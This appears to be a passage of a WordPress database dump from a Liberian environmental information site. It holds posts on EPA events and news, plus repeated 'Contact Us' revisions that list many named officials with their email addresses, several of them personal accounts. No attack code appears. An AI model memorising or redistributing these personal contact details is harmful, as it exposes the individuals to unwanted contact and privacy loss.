src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118302200_315769263200535_3757459247192883262_o-1024x914.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3462\" data-id=\"3462\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118306768_315769376533857_4579108221415119983_o-1024x613.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3465\" data-id=\"3465\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118516642_318832852894176_1811083475951686199_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3466\" data-id=\"3466\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118517244_318828242894637_3179541288288323454_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3467\" data-id=\"3467\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118521094_318828412894620_1359866884748954037_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3468\" data-id=\"3468\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118531582_318831672894294_733920385961592984_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3469\" data-id=\"3469\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118532262_318828476227947_6854980371134826307_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3470\" data-id=\"3470\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118534938_318828726227922_3755715513135385658_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3471\" data-id=\"3471\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118536633_318828566227938_5387686246171594942_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3472\" data-id=\"3472\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118538060_318831209561007_4651513210745790421_o-1024x768.jpg\"/></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-3473\" data-id=\"3473\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/118580522_318831586227636_510067784901104873_o-1024x768.jpg\"/></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\" role=\"button\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\" role=\"button\"></a><a aria-label=\"Pause Slideshow\" class=\"wp-block-jetpack-slideshow_button-pause\" role=\"button\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n<!-- /wp:jetpack/slideshow -->\n\n<!-- wp:gallery -->\n<figure class=\"wp-block-gallery columns-0 is-cropped\"><ul class=\"blocks-gallery-grid\"></ul></figure>\n<!-- /wp:gallery -->','Photo Gallery','','inherit','closed','closed','','3433-revision-v1','','','2021-01-29 14:58:12','2021-01-29 14:58:12','',3433,'https://ekmsliberia.info/3433-revision-v1/',0,'revision','',0),(3478,42,'2021-02-05 12:04:51','2021-02-05 12:04:51','','Analysis-of-Liberia-Environmental-Policy-Framework','','inherit','open','closed','','analysis-of-liberia-environmental-policy-framework-3','','','2021-02-05 12:04:51','2021-02-05 12:04:51','',1747,'https://ekmsliberia.info/wp-content/uploads/2019/11/Analysis-of-Liberia-Environmental-Policy-Framework-2.pdf',0,'attachment','application/pdf',0),(3479,42,'2021-02-08 12:13:40','2021-02-08 12:13:40','<!-- wp:paragraph -->\n<p>February 2, 2021 is World Wetlands Day (WWD). WWD is celebrated yearly to raise global awareness about the high importance of wetlands for people and our planets. It is also an occasion to commemorate the signing of the Ramsar Convention on Wetlands in the Iranian City of Ramsar in 1971.</p>\n<!-- /wp:paragraph -->','EPA Celebrates World Wetlands Day','','publish','closed','closed','','epa-celebrates-world-wetlands-day','','','2021-02-08 12:13:45','2021-02-08 12:13:45','',0,'https://ekmsliberia.info/?p=3479',182,'post','',0),(3480,42,'2021-02-08 12:12:40','2021-02-08 12:12:40','','WWD','','inherit','open','closed','','wwd','','','2021-02-08 12:12:40','2021-02-08 12:12:40','',3479,'https://ekmsliberia.info/wp-content/uploads/2021/02/WWD.jpg',0,'attachment','image/jpeg',0),(3481,42,'2021-02-08 12:13:40','2021-02-08 12:13:40','<!-- wp:paragraph -->\n<p>February 2, 2021 is World Wetlands Day (WWD). WWD is celebrated yearly to raise global awareness about the high importance of wetlands for people and our planets. It is also an occasion to commemorate the signing of the Ramsar Convention on Wetlands in the Iranian City of Ramsar in 1971.</p>\n<!-- /wp:paragraph -->','EPA Celebrates World Wetlands Day','','inherit','closed','closed','','3479-revision-v1','','','2021-02-08 12:13:40','2021-02-08 12:13:40','',3479,'https://ekmsliberia.info/3479-revision-v1/',0,'revision','',0),(3482,42,'2021-02-08 13:39:25','2021-02-08 13:39:25','<!-- wp:paragraph -->\n<p>The EPA in collaboration with Conservation International holds a two-day Blue Oceans Safeguards Training for partners at Musu Spot in Congo Town.</p>\n<!-- /wp:paragraph -->','The EPA in collaboration with Conservation International holds a two-day Blue Oceans Safeguards Training for partners','','publish','closed','closed','','the-epa-in-collaboration-with-conservation-international-holds-a-two-day-blue-oceans-safeguards-training-for-partners','','','2021-02-08 13:40:00','2021-02-08 13:40:00','',0,'https://ekmsliberia.info/?p=3482',181,'post','',0),(3483,42,'2021-02-08 13:38:48','2021-02-08 13:38:48','','BlueOceans','','inherit','open','closed','','blueoceans','','','2021-02-08 13:38:48','2021-02-08 13:38:48','',3482,'https://ekmsliberia.info/wp-content/uploads/2021/02/BlueOceans.jpg',0,'attachment','image/jpeg',0),(3484,42,'2021-02-08 13:39:25','2021-02-08 13:39:25','','The EPA in collaboration with Conservation International holds a two-day Blue Oceans Safeguards Training for partners','','inherit','closed','closed','','3482-revision-v1','','','2021-02-08 13:39:25','2021-02-08 13:39:25','',3482,'https://ekmsliberia.info/3482-revision-v1/',0,'revision','',0),(3485,42,'2021-02-08 13:39:57','2021-02-08 13:39:57','<!-- wp:paragraph -->\n<p>The EPA in collaboration with Conservation International holds a two-day Blue Oceans Safeguards Training for partners at Musu Spot in Congo Town.</p>\n<!-- /wp:paragraph -->','The EPA in collaboration with Conservation International holds a two-day Blue Oceans Safeguards Training for partners','','inherit','closed','closed','','3482-revision-v1','','','2021-02-08 13:39:57','2021-02-08 13:39:57','',3482,'https://ekmsliberia.info/3482-revision-v1/',0,'revision','',0),(3486,42,'2021-02-08 13:50:35','2021-02-08 13:50:35','<!-- wp:paragraph -->\n<p>A team of technicians and environmental scientists was out today, 5 February 2021 at Gbedin Waterfall in Northern Nimba County to inspect the proposed site for the construction of a mini hydro-power plant by Rural Renewable Energy Agency (RREA). The EPA is currently reviewing the Environmental Social Impact Assessment (ESIA) for the project and site verification is a major requirement provided by law. Kudos to the team headed by Manager Jallah and Assistant Manager Carlon.</p>\n<!-- /wp:paragraph -->','EPA Inspectors and Environmental Scientists Inspect the Proposed Site for the Construction of a Mini Hydro-Power Plant by Rural Renewable Energy Agency (RREA).','','publish','closed','closed','','epa-inspectors-and-environmental-scientists-inspect-the-proposed-site-for-the-construction-of-a-mini-hydro-power-plant-by-rural-renewable-energy-agency-rrea','','','2021-02-08 13:50:38','2021-02-08 13:50:38','',0,'https://ekmsliberia.info/?p=3486',180,'post','',0),(3487,42,'2021-02-08 13:49:44','2021-02-08 13:49:44','','epa','','inherit','open','closed','','epa-2','','','2021-02-08 13:49:44','2021-02-08 13:49:44','',3486,'https://ekmsliberia.info/wp-content/uploads/2021/02/epa.png',0,'attachment','image/png',0),(3488,42,'2021-02-08 13:50:35','2021-02-08 13:50:35','<!-- wp:paragraph -->\n<p>A team of technicians and environmental scientists was out today, 5 February 2021 at Gbedin Waterfall in Northern Nimba County to inspect the proposed site for the construction of a mini hydro-power plant by Rural Renewable Energy Agency (RREA). The EPA is currently reviewing the Environmental Social Impact Assessment (ESIA) for the project and site verification is a major requirement provided by law. Kudos to the team headed by Manager Jallah and Assistant Manager Carlon.</p>\n<!-- /wp:paragraph -->','EPA Inspectors and Environmental Scientists Inspect the Proposed Site for the Construction of a Mini Hydro-Power Plant by Rural Renewable Energy Agency (RREA).','','inherit','closed','closed','','3486-revision-v1','','','2021-02-08 13:50:35','2021-02-08 13:50:35','',3486,'https://ekmsliberia.info/3486-revision-v1/',0,'revision','',0),(3489,42,'2021-02-08 15:05:04','2021-02-08 15:05:04','<!-- wp:paragraph -->\n<p>he World Bank on Saturday, February 6, 2021 turned over an office complex to the Environmental Protection Agency (EPA) and the Forestry Development Authority (FDA) in Tubmanburg, Bomi County. Worth over US$300,000 the Tubmanburg regional office would be used by staff of the two entities for better efficiency and cost effectiveness. Implemented under the Liberia Forest Sector Project (LFSP), the project recognized the lack of adequate infrastructure in regional offices.The World Bank has been supporting Liberia\'s Forest Sector including the LFSP via grant funding of US$ 36.7 million provided by the Government of Norway and through the bank budget support of US$ 14 million to the Ministry of Finance in three tranches.</p>\n<!-- /wp:paragraph -->','The World Bank turns over an office complex to the EPA and the FDA in Tubmanburg, Bomi County.','','publish','closed','closed','','the-world-bank-turns-over-an-office-complex-to-the-epa-and-the-fda-in-tubmanburg-bomi-county','','','2021-02-08 15:05:07','2021-02-08 15:05:07','',0,'https://ekmsliberia.info/?p=3489',179,'post','',0),(3490,42,'2021-02-08 14:36:53','2021-02-08 14:36:53','','building','','inherit','open','closed','','building','','','2021-02-08 14:36:53','2021-02-08 14:36:53','',3489,'https://ekmsliberia.info/wp-content/uploads/2021/02/building.png',0,'attachment','image/png',0),(3491,42,'2021-02-08 15:05:04','2021-02-08 15:05:04','<!-- wp:paragraph -->\n<p>he World Bank on Saturday, February 6, 2021 turned over an office complex to the Environmental Protection Agency (EPA) and the Forestry Development Authority (FDA) in Tubmanburg, Bomi County. Worth over US$300,000 the Tubmanburg regional office would be used by staff of the two entities for better efficiency and cost effectiveness. Implemented under the Liberia Forest Sector Project (LFSP), the project recognized the lack of adequate infrastructure in regional offices.The World Bank has been supporting Liberia\'s Forest Sector including the LFSP via grant funding of US$ 36.7 million provided by the Government of Norway and through the bank budget support of US$ 14 million to the Ministry of Finance in three tranches.</p>\n<!-- /wp:paragraph -->','The World Bank turns over an office complex to the EPA and the FDA in Tubmanburg, Bomi County.','','inherit','closed','closed','','3489-revision-v1','','','2021-02-08 15:05:04','2021-02-08 15:05:04','',3489,'https://ekmsliberia.info/3489-revision-v1/',0,'revision','',0),(3498,42,'2021-02-17 11:26:39','2021-02-17 11:26:39','<!-- wp:paragraph -->\n<p>EPA Joins the Ministry of Agriculture in observance of National Agriculture Fair 2021 in Suakoko, Bong County. The 2021 Agriculture Fair is being held under the theme: \"Investing in Agriculture for Prosperity and Development\" from February 12-14. </p>\n<!-- /wp:paragraph -->','EPA Joins the MOA in observance of National Agriculture Fair 2021 in Suakoko, Bong County.','','publish','closed','closed','','epa-joins-the-moa-in-observance-of-national-agriculture-fair-2021-in-suakoko-bong-county','','','2021-02-17 11:26:56','2021-02-17 11:26:56','',0,'https://ekmsliberia.info/?p=3498',178,'post','',0),(3499,42,'2021-02-17 11:26:04','2021-02-17 11:26:04','','MOA','','inherit','open','closed','','moa','','','2021-02-17 11:26:04','2021-02-17 11:26:04','',3498,'https://ekmsliberia.info/wp-content/uploads/2021/02/MOA.png',0,'attachment','image/png',0),(3500,42,'2021-02-17 11:26:39','2021-02-17 11:26:39','<!-- wp:paragraph -->\n<p>EPA Joins the Ministry of Agriculture in observance of National Agriculture Fair 2021 in Suakoko, Bong County. The 2021 Agriculture Fair is being held under the theme: \"Investing in Agriculture for Prosperity and Development\" from February 12-14. </p>\n<!-- /wp:paragraph -->','EPA Joins the MOA in observance of National Agriculture Fair 2021 in Suakoko, Bong County.','','inherit','closed','closed','','3498-revision-v1','','','2021-02-17 11:26:39','2021-02-17 11:26:39','',3498,'https://ekmsliberia.info/3498-revision-v1/',0,'revision','',0),(3503,42,'2021-02-22 15:48:02','2021-02-22 15:48:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-22 15:48:02','2021-02-22 15:48:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3504,42,'2021-02-22 15:48:02','2021-02-22 15:48:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 